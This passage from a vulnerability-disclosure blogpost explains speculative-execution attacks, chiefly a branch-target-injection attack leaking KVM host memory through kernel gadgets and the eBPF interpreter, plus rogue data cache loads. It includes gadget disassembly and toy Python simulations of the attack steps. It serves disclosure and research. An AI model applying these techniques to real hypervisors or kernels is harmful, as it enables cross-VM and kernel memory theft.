Because (as far as we know) a simple hypercall won't actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.
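The bisection step can be sketched as follows (Python; `observes_group_a` is a hypothetical stand-in for placing the two cache-line-loading code snippets and measuring which line gets loaded):

```python
def bisect_aliases(candidates, observes_group_a):
    # Repeatedly split the alias candidates in half: code placed at
    # group A's targets loads cache line A, code at the remaining
    # targets loads line B; the cache measurement tells us which half
    # contains the truly executed target.
    while len(candidates) > 1:
        group_a = candidates[:len(candidates) // 2]
        if observes_group_a(group_a):
            candidates = group_a
        else:
            candidates = candidates[len(candidates) // 2:]
    return candidates[0]

# Toy check with 16 aliasing addresses and a known correct one:
aliases = [0xffffffffc0000000 + (i << 20) for i in range(16)]
true_target = aliases[11]
found = bisect_aliases(aliases, lambda group: true_target in group)
```

With 16 candidates this needs only four rounds of measurement instead of up to 16 individual tests.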

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages. To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they're probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].
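The reduction step can be illustrated with a simulated cache (Python sketch; the associativity, the page-to-set mapping, and the eviction test are all simplifying assumptions standing in for real timing measurements):

```python
ASSOC = 12                      # assumed L3 associativity

def cache_set(page):
    # Toy page-address-to-L3-set mapping for the simulation
    return page % 64

def evicts(lines, victim):
    # Simplified model: a group of lines evicts the victim iff at
    # least ASSOC of them map to the victim's cache set.
    return sum(1 for l in lines if cache_set(l) == cache_set(victim)) >= ASSOC

def reduce_to_eviction_set(candidates, victim):
    # Drop lines one at a time as long as the remainder still evicts
    # the victim; what survives is a minimal eviction set.
    working = list(candidates)
    for line in list(working):
        rest = [l for l in working if l != line]
        if evicts(rest, victim):
            working = rest
    return working

pages = list(range(2000))       # toy "pages"; the real PoC uses 25600
victim = pages[0]
eviction_set = reduce_to_eviction_set(pages[1:], victim)
```

In the real attack, `evicts` is replaced by accessing the candidate lines and timing whether the victim line got kicked out of the cache.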

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used - R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

To brute-force the physical address, the following gadget can be used:

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 - the physical address guess minus 0xf8 - is added to the result of the previous load, 0xf8 is added to it, and the result is dereferenced.
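The gadget's effect can be modeled in a few lines (Python sketch with toy addresses; `mem` is a hypothetical flat view of host-kernel virtual memory, and the constants come from the disassembly above):

```python
def run_gadget(mem, r8, r9):
    # Model of the disassembled gadget: rax <- r8; r15 <- sext(r9d);
    # r8 <- mem[r15*8 - 0x7e594c40]; result <- mem[r8 + rax + 0xf8]
    rax = r8
    r15 = r9 & 0xffffffff
    if r15 & 0x80000000:
        r15 -= 1 << 32             # movsxd sign-extends r9d
    r8 = mem[r15 * 8 - 0x7e594c40]
    return mem[r8 + rax + 0xf8]

# Toy layout: an 8-byte slot reachable via r9 holds the (randomized)
# physmap base, i.e. page_offset_base in the real kernel.
physmap_base = 0x1000000
phys_guess = 0x42000
mem = {
    8 * 5 - 0x7e594c40: physmap_base,       # slot selected by r9d = 5
    physmap_base + phys_guess: 0xdeadbeef,  # "physical" memory contents
}
# The attacker puts the physical address guess minus 0xf8 into R8:
leaked = run_gadget(mem, phys_guess - 0xf8, 5)
```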

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

The eBPF interpreter entry point has the following function signature:

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed - which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn't matter.

The eBPF interpreter provides, among other things:

  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations
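These primitives are enough to turn a secret bit into a cache-line access, which is all the FLUSH+RELOAD step needs. A Python sketch of the bytecode's effect (the function names are ours for illustration, not kernel API):

```python
PAGE = 4096

def leak_bit_via_cache(load, secret_addr, bit, probe_base):
    # Sequence expressible in eBPF: a memory read into an emulated
    # register, shift + mask to isolate one bit, then a second read
    # whose address depends on that bit. The second read pulls one of
    # two attacker-monitored cache lines into the cache.
    value = load(secret_addr)
    bit_value = (value >> bit) & 1
    load(probe_base + bit_value * PAGE)
    return bit_value

# Toy memory and an access log standing in for cache observation:
memory = {0x1234: 0b10110010}
accessed = []
def load(addr):
    accessed.append(addr)
    return memory.get(addr, 0)

b = leak_bit_via_cache(load, 0x1234, 4, 0x100000)
# b == 1, and the access at probe_base + PAGE reveals the bit
```

In the real attack, the attacker flushes both probe lines beforehand and times reloads afterwards to see which line the speculatively executed bytecode touched.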

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.

Variant 3: Rogue data cache load

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

We do have a few additions to make to Anders Fogh's blogpost:

"Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, [...]"

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

"First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1."

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

"Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed."

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost - it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical - in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

The same might work for cache sets - use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 2^31-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

The source address aliasing would reduce the usefulness somewhat, but because target addresses don't suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn't lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn't reloaded before the return instruction).

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven't been able to make it work.

Vendor statements

The following statements were provided to us regarding this issue from the vendors to whom we disclosed this vulnerability:

Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

For more information and links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents - in particular Intel's documentation - change over time, so quotes from and references to it may not reflect the latest version of Intel's documentation.

  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel's optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • "Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems."
    • "Loads can:[...]Be carried out speculatively, before preceding branches are resolved."
    • "Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition."
    • "if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches"
    • "Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch)."
  • https://software.intel.com/en-us/articles/intel-sdm: Intel's Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog's documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm's research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D'Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel's Ivy Bridge architecture.

References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh's work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section "Tested Processors". The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won't work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available at http://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpg, Release, Packages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 2^15 mappings would be more efficient, but the kernel places a hard cap of 2^16 on the number of VMAs that a process can have.
[10] Intel's optimization manual states that "In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor", so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn't seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin - in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn't a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.
